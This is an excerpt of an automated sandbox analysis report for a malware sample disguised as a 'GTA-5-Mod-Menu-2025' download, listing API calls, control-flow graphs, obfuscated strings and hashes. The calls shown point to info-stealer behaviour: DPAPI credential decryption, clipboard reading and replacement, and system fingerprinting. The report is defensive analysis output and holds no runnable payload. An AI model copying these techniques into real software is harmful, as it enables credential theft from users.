                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437FF7
                                                                    • SysAllocString.OLEAUT32(00001F7A), ref: 0043805B
                                                                    • SysAllocString.OLEAUT32(26E420F4), ref: 00438117
                                                                    • VariantInit.OLEAUT32(D4D7D6C1), ref: 00438182
                                                                    • SysFreeString.OLEAUT32(?), ref: 004384C1
                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 004384F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                    • String ID: 9\$FW$RK$VXY^$$*
                                                                    • API String ID: 505850577-3836248974
                                                                    • Opcode ID: bc64886510a09306bd420e3a84a103cc457e0968f255a6ac2ef7d176806d5cde
                                                                    • Instruction ID: 6926d6d2aad4ba28142aefd9611f22a979aaa00092556b22ceb2f4df3deccf76
                                                                    • Opcode Fuzzy Hash: bc64886510a09306bd420e3a84a103cc457e0968f255a6ac2ef7d176806d5cde
                                                                    • Instruction Fuzzy Hash: F642E072A083518FD714CF29C84076BFBE2EFD9310F18892EF9959B391DA79D8058B46

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 566 41071b-410739 567 41073d-410740 566->567 568 410742-4107b6 567->568 569 4107b8-4107e2 call 401880 567->569 568->567 572 4107e4-4107e7 569->572 573 410878-41089d call 401880 572->573 574 4107ed-410873 572->574 577 4108a1 573->577 578 41089f-4108dc call 413dd0 573->578 574->572 580 411372 577->580 586 4108e0-410921 call 407fb0 call 40a740 578->586 587 4108de 578->587 582 411df2 580->582 583 411df4-411df7 call 401f40 582->583 593 40eb15-411e08 583->593 594 40eb1c-40eb42 call 401f50 583->594 599 410923-410926 586->599 587->586 600 40eb44-40eb47 594->600 601 410993-4109b3 call 401880 599->601 602 410928-410991 599->602 604 40eb49-40eb79 600->604 605 40eb7b-40eb9d call 401e40 600->605 608 410a11-410a3b call 413dd0 601->608 609 4109b5-4109e2 call 413dd0 601->609 602->599 604->600 612 40eba1 605->612 613 40eb9f-40ebbe 605->613 621 410a3d 608->621 622 410a3f-410adb call 407fb0 call 40a740 RtlExpandEnvironmentStrings 608->622 618 4109e4 609->618 619 4109e6-410a0f call 407fb0 call 40a740 609->619 612->583 620 40ebc0-40ebc3 613->620 618->619 619->608 625 40ebc5-40ebed 620->625 626 40ebef-40ec3c call 401980 620->626 621->622 636 410add-410ae0 622->636 625->620 626->582 633 40ec42-40ec49 626->633 633->582 637 410ae2-410b2c 636->637 638 410b2e-410b42 636->638 637->636 639 410b44-410b75 638->639 640 410b46-410b57 call 407fc0 638->640 644 410b77 639->644 645 410b79-410bd4 call 407fb0 RtlExpandEnvironmentStrings 639->645 649 41136e-411370 640->649 644->645 650 410c01-410c2e call 407fc0 645->650 651 410bd6-410bfc call 407fc0 * 2 645->651 649->580 660 410c30-410c33 650->660 672 41136c 651->672 661 410c35-410ca4 660->661 662 410ca6-410cbd call 401880 660->662 661->660 668 410d13-410d3b 662->668 669 410cbf-410ceb call 413dd0 662->669 673 410d3f-410d42 668->673 678 410ced 669->678 679 410cef-410d0e call 407fb0 call 40a740 669->679 672->649 675 410d44-410d79 673->675 676 410d7b-410dbd call 401b90 673->676 675->673 682 410dbf-410dc2 676->682 678->679 679->668 684 410dc4-410e07 682->684 685 410e09-410e36 call 401a90 682->685 684->682 689 410e38 685->689 690 410e3d-410e88 call 401f40 685->690 691 411237-4112bb call 408b80 call 414f10 689->691 696 410e8a 690->696 697 410e8c-410eac call 407fb0 690->697 700 4112c0-4112cf call 409690 691->700 696->697 703 410ed7-410ed9 697->703 704 410eae-410eba 697->704 711 4112d1-4112e0 700->711 712 411304-411337 call 407fc0 * 2 700->712 706 410edb-410edd 703->706 705 410ebc-410ec8 call 413f20 704->705 719 410eca-410ed5 705->719 709 410eeb-410f32 call 401f50 706->709 710 410edf-410ee6 706->710 724 410f34-410f37 709->724 710->691 716 4112e2 711->716 717 4112f4-411300 call 407fc0 711->717 742 411339-411345 call 407fc0 712->742 743 41134a-411354 712->743 721 4112e4-4112f0 call 4140e0 716->721 717->712 719->703 732 4112f2 721->732 728 410fb1-410ff4 call 401880 724->728 729 410f39-410faf 724->729 737 410ff8-410ffb 728->737 729->724 732->717 738 410ffd-41105a 737->738 739 41105c-4110aa call 401880 737->739 738->737 749 4110ae-4110b1 739->749 742->743 746 411356-411359 call 407fc0 743->746 747 41135e-41136a call 408c60 743->747 746->747 747->672 753 4110d0-411120 call 401b90 749->753 754 4110b3-4110ce 749->754 757 411122-411125 753->757 754->749 758 41112b-4111a8 757->758 759 4111ad-411232 call 401b90 call 413f40 757->759 758->757 759->706
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$$$%$'$F$N$S$\$b$o
                                                                    • API String ID: 0-84100704
                                                                    • Opcode ID: 920434e3bbb1055f08cbbbef1449c2755f9aadc7d1f1bcbf8e1b300a40acd0ac
                                                                    • Instruction ID: c00f3763dd2cd0e02029fc9ed613a1e5ffa9e5b3df9123746fde01e65d56ae4d
                                                                    • Opcode Fuzzy Hash: 920434e3bbb1055f08cbbbef1449c2755f9aadc7d1f1bcbf8e1b300a40acd0ac
                                                                    • Instruction Fuzzy Hash: 3072C572A0C7908BD3249F38858139FBBE1ABC5324F198A3ED9E9D73D1D67889418747

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNELBASE(00000001), ref: 05AD1032
                                                                    • OpenClipboard.USER32(00000000), ref: 05AD103C
                                                                    • GetClipboardData.USER32(0000000D), ref: 05AD104C
                                                                    • GlobalLock.KERNEL32(00000000), ref: 05AD105D
                                                                    • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05AD1090
                                                                    • GlobalLock.KERNEL32 ref: 05AD10A0
                                                                    • GlobalUnlock.KERNEL32 ref: 05AD10C1
                                                                    • EmptyClipboard.USER32 ref: 05AD10CB
                                                                    • SetClipboardData.USER32(0000000D), ref: 05AD10D6
                                                                    • GlobalFree.KERNEL32 ref: 05AD10E3
                                                                    • GlobalUnlock.KERNEL32(?), ref: 05AD10ED
                                                                    • CloseClipboard.USER32 ref: 05AD10F3
                                                                    • GetClipboardSequenceNumber.USER32 ref: 05AD10F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3338430846.0000000005AD1000.00000020.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: true
                                                                    • Associated: 00000004.00000002.3338414518.0000000005AD0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3338446261.0000000005AD2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_5ad0000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                    • String ID:
                                                                    • API String ID: 1416286485-0
                                                                    • Opcode ID: 3e08f92c2cd2cfcca91a2cee3f8d01a2565cb681b498d8ca820720bd9eb32861
                                                                    • Instruction ID: 7a49853d29d254ee8dec114da61c7593194d67c9681fb238b49b1ab18a447780
                                                                    • Opcode Fuzzy Hash: 3e08f92c2cd2cfcca91a2cee3f8d01a2565cb681b498d8ca820720bd9eb32861
                                                                    • Instruction Fuzzy Hash: 82217F39616250ABD7207BB5AC0EF6EBBA8FF047A1F044428FD57D6151EF318802CAB1
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415AB7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CryptDataUnprotect
                                                                    • String ID: *!:-$2S]$3!15$7. -$7aij$=6&$$Gaij$L4$L4
                                                                    • API String ID: 834300711-704517314
                                                                    • Opcode ID: 822a40aa5428660162201b021693d50cb2301493423aa4e64fb8d6747bfb54a0
                                                                    • Instruction ID: 2ac1b55faac0ce13068304374b71d1fcc00fe8222e30f950e028eed32ca90894
                                                                    • Opcode Fuzzy Hash: 822a40aa5428660162201b021693d50cb2301493423aa4e64fb8d6747bfb54a0
                                                                    • Instruction Fuzzy Hash: 9F8259B5600B00CFD7248F25D8817A7B7B2FF96314F18856DD4968B7A2E738E842CB59

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1171 408780-408791 call 43c650 1174 408797-40879e call 434f20 1171->1174 1175 408a88-408a8a ExitProcess 1171->1175 1178 408a83 call 43ceb0 1174->1178 1179 4087a4-4087c8 GetCurrentProcessId GetCurrentThreadId 1174->1179 1178->1175 1181 4087ca-4087cc 1179->1181 1182 4087ce-4088ff SHGetSpecialFolderPathW 1179->1182 1181->1182 1183 408900-40892f 1182->1183 1183->1183 1184 408931-40895f call 43b210 1183->1184 1187 408960-40897c 1184->1187 1188 408996-4089a9 GetForegroundWindow 1187->1188 1189 40897e-408994 1187->1189 1190 408a32-408a65 call 409be0 1188->1190 1191 4089af-408a30 1188->1191 1189->1187 1194 408a71-408a78 1190->1194 1195 408a67 call 40c750 1190->1195 1191->1190 1194->1178 1197 408a7a-408a80 call 407fc0 1194->1197 1198 408a6c call 40b620 1195->1198 1197->1178 1198->1194
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004087A4
                                                                    • GetCurrentThreadId.KERNEL32 ref: 004087AE
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088DE
                                                                    • GetForegroundWindow.USER32 ref: 004089A1
                                                                    • ExitProcess.KERNEL32 ref: 00408A8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                    • String ID:
                                                                    • API String ID: 4063528623-0
                                                                    • Opcode ID: a4a9dc485aa32321631a9ba88ac381a08f4a0956d527d7d86e0b56ac7b8da779
                                                                    • Instruction ID: cc6bda6eca60c13a9d8e9732e89be167aa24b00acb0026d6f1978ca01de75c66
                                                                    • Opcode Fuzzy Hash: a4a9dc485aa32321631a9ba88ac381a08f4a0956d527d7d86e0b56ac7b8da779
                                                                    • Instruction Fuzzy Hash: F2812773B443054FC318EF6DCD8231AF6D6ABC8310F1A853EA984E7395EAB89C054785

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1202 409be0-409bff 1203 409c00-409c88 1202->1203 1203->1203 1204 409c8e-409cc9 1203->1204 1205 409cd0-409d09 1204->1205 1205->1205 1206 409d0b-409d12 1205->1206 1207 409d15-409d45 call 43c610 1206->1207
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "W$Q$9G3A$RS$pC+M$|K8U$}OzI
                                                                    • API String ID: 0-3685063334
                                                                    • Opcode ID: 96bdf282e63e740944a1609b8ac8317ffb540b32e09e9ccf2b302386b6e0a61f
                                                                    • Instruction ID: eb4d91d3156f656bf2d157b2e035d4208538888ed5a2d7088973be6aa032edce
                                                                    • Opcode Fuzzy Hash: 96bdf282e63e740944a1609b8ac8317ffb540b32e09e9ccf2b302386b6e0a61f
                                                                    • Instruction Fuzzy Hash: 0B319B7675D7180BD318DFA5ACC12ABB656EBC6304F19903CC9D457341DAF859028B89

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1214 422111-422121 1215 4221c0 1214->1215 1216 422128-422143 1214->1216 1218 4221c6-4221cc 1215->1218 1217 422150-42218f 1216->1217 1217->1217 1219 422191-4221a0 1217->1219 1220 4221f2-4221f7 1218->1220 1221 4221ce-4221ea call 43cf30 1218->1221 1219->1220 1222 4221a2-4221aa 1219->1222 1224 422205-422243 1220->1224 1225 4221fe-422200 1220->1225 1226 42230d-422319 1220->1226 1254 4221ef 1221->1254 1227 4221b0-4221b7 1222->1227 1256 422245-42224c 1224->1256 1257 42224f-42225f 1224->1257 1255 422942-422948 1225->1255 1229 4223c0-4223cf 1226->1229 1230 422440-422453 1226->1230 1231 422480 1226->1231 1232 422681-42268e 1226->1232 1233 42258a-42259f 1226->1233 1234 422549 1226->1234 1235 42254f-422557 1226->1235 1236 422350 1226->1236 1237 422410-422422 1226->1237 1238 422510-422532 1226->1238 1239 4223d6-4223e2 1226->1239 1240 422356-422366 1226->1240 1241 422695-4226aa 1226->1241 1242 42245a-422472 1226->1242 1243 4224a2-4224ac 1226->1243 1244 422320-42233d 1226->1244 1245 422560-422567 1226->1245 1246 4224e8-4224ff 1226->1246 1247 4223e9-4223fe 1226->1247 1248 422429-422439 1226->1248 1249 42236d-4223b1 call 43eb60 * 2 1226->1249 1250 4224b3-4224e1 call 40a740 1226->1250 1251 4225b0-4225c2 1226->1251 1252 422570-422583 1226->1252 1253 422539-422542 1226->1253 1227->1218 1228 4221b9-4221bc 1227->1228 1228->1227 1258 4221be 1228->1258 1229->1229 1229->1230 1229->1231 1229->1232 1229->1233 1229->1234 1229->1235 1229->1236 1229->1237 1229->1238 1229->1239 1229->1240 1229->1241 1229->1242 1229->1243 1229->1245 1229->1246 1229->1247 1229->1248 1229->1249 1229->1250 1229->1251 1229->1252 1229->1253 1230->1231 1230->1232 1230->1233 1230->1234 1230->1235 1230->1236 1230->1237 1230->1238 1230->1240 1230->1241 1230->1242 1230->1243 1230->1245 1230->1246 1230->1249 1230->1250 1230->1251 1230->1252 1230->1253 1232->1241 1259 422710-422718 1232->1259 1260 422720-422728 1232->1260 1261 422750-42275d 1232->1261 1262 4228c1-4228d5 1232->1262 1263 422707 1232->1263 1264 4226d5-422700 1232->1264 1265 4228aa-4228ba 1232->1265 1266 4228f9-422908 1232->1266 1267 42290f 1232->1267 1233->1232 1233->1243 1233->1251 1235->1245 1237->1229 1237->1230 1237->1231 1237->1232 1237->1233 1237->1234 1237->1235 1237->1236 1237->1237 1237->1238 1237->1240 1237->1241 1237->1242 1237->1243 1237->1245 1237->1246 1237->1248 1237->1249 1237->1250 1237->1251 1237->1252 1237->1253 1238->1232 1238->1233 1238->1234 1238->1235 1238->1243 1238->1245 1238->1252 1238->1253 1239->1229 1239->1230 1239->1231 1239->1232 1239->1233 1239->1234 1239->1235 1239->1236 1239->1237 1239->1238 1239->1240 1239->1241 1239->1242 1239->1243 1239->1245 1239->1246 1239->1247 1239->1248 1239->1249 1239->1250 1239->1251 1239->1252 1239->1253 1240->1232 1240->1233 1240->1234 1240->1235 1240->1238 1240->1241 1240->1243 1240->1245 1240->1246 1240->1249 1240->1250 1240->1251 1240->1252 1240->1253 1241->1259 1241->1260 1241->1261 1241->1262 1241->1263 1241->1264 1241->1265 1241->1266 1268 4226c0-4226ce 1241->1268 1242->1231 1243->1232 1243->1233 1243->1234 1243->1235 1243->1238 1243->1243 1243->1245 1243->1246 1243->1250 1243->1251 1243->1252 1243->1253 1244->1229 1244->1230 1244->1231 1244->1232 1244->1233 1244->1234 1244->1235 1244->1236 1244->1237 1244->1238 1244->1239 1244->1240 1244->1241 1244->1242 1244->1243 1244->1245 1244->1246 1244->1247 1244->1248 1244->1249 1244->1250 1244->1251 1244->1252 1244->1253 1245->1252 1246->1232 1246->1233 1246->1234 1246->1235 1246->1238 1246->1243 1246->1245 1246->1252 1246->1253 1247->1229 1247->1230 1247->1231 1247->1232 1247->1233 1247->1234 1247->1235 1247->1236 1247->1237 1247->1238 1247->1240 1247->1241 1247->1242 1247->1243 1247->1245 1247->1246 1247->1248 1247->1249 1247->1250 1247->1251 1247->1252 1247->1253 1248->1230 1248->1231 1248->1232 1248->1233 1248->1234 1248->1235 1248->1236 1248->1237 1248->1238 1248->1240 1248->1241 1248->1242 1248->1243 1248->1245 1248->1246 1248->1249 1248->1250 1248->1251 1248->1252 1248->1253 1249->1229 1249->1232 1249->1233 1249->1234 1249->1235 1249->1238 1249->1243 1249->1245 1249->1246 1249->1250 1249->1251 1249->1252 1249->1253 1250->1232 1250->1233 1250->1234 1250->1235 1250->1238 1250->1243 1250->1245 1250->1246 1250->1251 1250->1252 1250->1253 1273 4225d0-422609 1251->1273 1252->1232 1252->1233 1252->1234 1252->1235 1252->1238 1252->1243 1252->1245 1252->1252 1252->1253 1253->1232 1253->1234 1253->1235 1253->1238 1253->1243 1253->1245 1253->1252 1254->1220 1272 422950 1255->1272 1256->1257 1269 422260-42229f 1257->1269 1258->1220 1259->1260 1260->1261 1261->1266 1261->1267 1261->1268 1261->1272 1274 4228e0-4228f2 1261->1274 1275 422911-422918 1261->1275 1276 422921-42292b 1261->1276 1277 42292d-42293f 1261->1277 1281 422770 1261->1281 1282 4227c0 1261->1282 1283 4227d0-4227e2 1261->1283 1284 422776-4227b9 1261->1284 1262->1266 1262->1267 1262->1272 1262->1274 1262->1275 1262->1276 1262->1277 1263->1259 1264->1259 1264->1260 1264->1261 1264->1263 1265->1259 1265->1260 1265->1261 1265->1262 1265->1263 1265->1266 1266->1267 1266->1272 1266->1275 1266->1276 1266->1277 1267->1275 1268->1259 1268->1260 1268->1261 1268->1262 1268->1263 1268->1264 1268->1265 1268->1266 1269->1269 1279 4222a1-4222ac 1269->1279 1273->1273 1288 42260b-422612 1273->1288 1274->1266 1274->1267 1274->1272 1274->1275 1274->1276 1274->1277 1275->1276 1276->1255 1277->1255 1289 4222ae-4222bf 1279->1289 1290 4222dc-422306 1279->1290 1282->1283 1291 4227f0-42282f 1283->1291 1284->1266 1284->1267 1284->1272 1284->1274 1284->1275 1284->1276 1284->1277 1284->1282 1284->1283 1293 422490-42249b 1288->1293 1294 422618-422624 1288->1294 1300 4222c0-4222c7 1289->1300 1290->1224 1290->1225 1290->1226 1291->1291 1301 422831-422839 1291->1301 1293->1232 1293->1243 1295 422630-422637 1294->1295 1303 422643-422649 1295->1303 1304 422639-42263c 1295->1304 1305 4222d0-4222d6 1300->1305 1306 4222c9-4222cc 1300->1306 1301->1268 1307 42283f-42284f 1301->1307 1303->1293 1309 42264f-42267a call 43cf30 1303->1309 1304->1295 1308 42263e 1304->1308 1305->1290 1311 422952-422972 call 43cf30 1305->1311 1306->1300 1310 4222ce 1306->1310 1312 422850-422857 1307->1312 1308->1293 1309->1232 1309->1243 1310->1290 1318 422977-4229a1 1311->1318 1314 422863-422869 1312->1314 1315 422859-42285c 1312->1315 1314->1268 1320 42286f-42288d call 43cf30 1314->1320 1315->1312 1319 42285e 1315->1319 1319->1268 1322 422892-4228a3 1320->1322 1322->1259 1322->1260 1322->1261 1322->1262 1322->1263 1322->1264 1322->1265 1322->1266
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =.B$R2B$$
                                                                    • API String ID: 0-2815797704
                                                                    • Opcode ID: 75b90a3b4f85d509a2ae3722130fe19e06319d5f6d3282c49123bd1d7350a29e
                                                                    • Instruction ID: 7cd2bbcac7590c6716dd4b2256a7d3fedecacfa041c4029d4c057bdc66e4778b
                                                                    • Opcode Fuzzy Hash: 75b90a3b4f85d509a2ae3722130fe19e06319d5f6d3282c49123bd1d7350a29e
                                                                    • Instruction Fuzzy Hash: D0224335A18611DFD718CF24DC51B6AB3E2FF89311F19897CE485873A1DB78A950CB44

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1323 42be7c-42beb5 call 431dd0 call 407fc0 1328 42bec0-42bf21 1323->1328 1328->1328 1329 42bf23-42bf2a 1328->1329 1330 42bf3b-42bf47 1329->1330 1331 42bf2c 1329->1331 1333 42bf61-42bfc9 call 43eb60 GetPhysicallyInstalledSystemMemory 1330->1333 1334 42bf49-42bf4b 1330->1334 1332 42bf30-42bf39 1331->1332 1332->1330 1332->1332 1339 42bfd0-42bfef 1333->1339 1336 42bf50-42bf5d 1334->1336 1336->1336 1338 42bf5f 1336->1338 1338->1333 1339->1339 1340 42bff1-42c027 call 41d780 1339->1340 1343 42c030-42c08b 1340->1343 1343->1343 1344 42c08d-42c094 1343->1344 1345 42c096-42c09f 1344->1345 1346 42c0ad 1344->1346 1347 42c0a0-42c0a9 1345->1347 1348 42c0b1-42c0b9 1346->1348 1347->1347 1349 42c0ab 1347->1349 1350 42c0cb-42c0d8 1348->1350 1351 42c0bb-42c0bf 1348->1351 1349->1348 1352 42c0da-42c0e1 1350->1352 1353 42c0fb-42c154 1350->1353 1354 42c0c0-42c0c9 1351->1354 1355 42c0f0-42c0f9 1352->1355 1356 42c160-42c184 1353->1356 1354->1350 1354->1354 1355->1353 1355->1355 1356->1356 1357 42c186-42c18d 1356->1357 1358 42c18f-42c195 1357->1358 1359 42c1ad 1357->1359 1360 42c1a0-42c1a9 1358->1360 1361 42c1af-42c1bc 1359->1361 1360->1360 1362 42c1ab 1360->1362 1363 42c1db-42c27e 1361->1363 1364 42c1be-42c1c5 1361->1364 1362->1361 1365 42c1d0-42c1d9 1364->1365 1365->1363 1365->1365
                                                                    APIs
                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042BF99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                    • String ID: 0(7+$A_
                                                                    • API String ID: 3960555810-2536533443
                                                                    • Opcode ID: 60f774cca624d080834627199ca00e1c3705bf244df9c748e2fa3423c9618fd6
                                                                    • Instruction ID: 3c15a2731ec9df5d532ea8724227bf1f71f9f9e92d00e995c7c56334d73fdb8f
                                                                    • Opcode Fuzzy Hash: 60f774cca624d080834627199ca00e1c3705bf244df9c748e2fa3423c9618fd6
                                                                    • Instruction Fuzzy Hash: 40A1E971A0C3918BD335CF25D8903ABBFD1AFDA304F58896ED4C997382C6794906CB56

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1366 4328f0-4329ce call 414270 GetSystemMetrics * 2 1374 4329d5-432a66 1366->1374
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 4116985748-3916222277
                                                                    • Opcode ID: 4bd733916ec63c2f9a6203a9826a434b0703fda1dc664b3d3d4113c640a0f036
                                                                    • Instruction ID: 1190f5139ee5e2985b26a7f597f1216863c8a1da9097ffc89f262bca0f2c0291
                                                                    • Opcode Fuzzy Hash: 4bd733916ec63c2f9a6203a9826a434b0703fda1dc664b3d3d4113c640a0f036
                                                                    • Instruction Fuzzy Hash: 675173B4D142098FCB40EFACD98569EBBF0BF49310F118529E498E7350D774A945CF96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: #_&+$i^]j$x[eh
                                                                    • API String ID: 2994545307-2692929423
                                                                    • Opcode ID: 3cd3a6b2bee4226ec8bf6c0051dac9d8d12e2e8d50b63a711947c241b514037d
                                                                    • Instruction ID: d65bd34988bb7b4adb15161f99bdae07ed86368e1c3f44230ae69dd39fddd604
                                                                    • Opcode Fuzzy Hash: 3cd3a6b2bee4226ec8bf6c0051dac9d8d12e2e8d50b63a711947c241b514037d
                                                                    • Instruction Fuzzy Hash: 71817EB5B143305BD714AA24FC9273B72A6EBD5314F5D843EE98187345EA3CAC01879E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: 54+*$D]+\$D]+\
                                                                    • API String ID: 2994545307-3648902565
                                                                    • Opcode ID: d151e8d2c18237a71c1e92da42996668e577cda36eb6f4f76096e79221bde7b3
                                                                    • Instruction ID: 076430d849b985c7fb886674556cdf4a35e1a91a73ea2cf47fa32338d3bb83cb
                                                                    • Opcode Fuzzy Hash: d151e8d2c18237a71c1e92da42996668e577cda36eb6f4f76096e79221bde7b3
                                                                    • Instruction Fuzzy Hash: 2E41093AB411119FCB18CB68DC916BF73E2AB9D310F28623EC552A73E5CA7C5C019B59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: "!"#$gvwt
                                                                    • API String ID: 2994545307-1393724390
                                                                    • Opcode ID: cc14641c914d83c1746ebe36b247aa7853d09e1b60199da729c2ff415bda785c
                                                                    • Instruction ID: 100a54b9adf57271f74906b654984dd891f0d04330d0776a6c10bb3f4ef77765
                                                                    • Opcode Fuzzy Hash: cc14641c914d83c1746ebe36b247aa7853d09e1b60199da729c2ff415bda785c
                                                                    • Instruction Fuzzy Hash: C8A17636A183104FD718CE25D88066BB7A3ABD9310F1DD93DE9858B395DA39DC05C786
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 0043DC8D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ForegroundWindow
                                                                    • String ID:
                                                                    • API String ID: 2020703349-0
                                                                    • Opcode ID: 00de8a58601623091de1ddb511819d236fd72ee68c6e052be62c42d3192636a9
                                                                    • Instruction ID: 4f9175ce35c3083a93e9af82ab3bf18242998607a85237f61af41161cf16065f
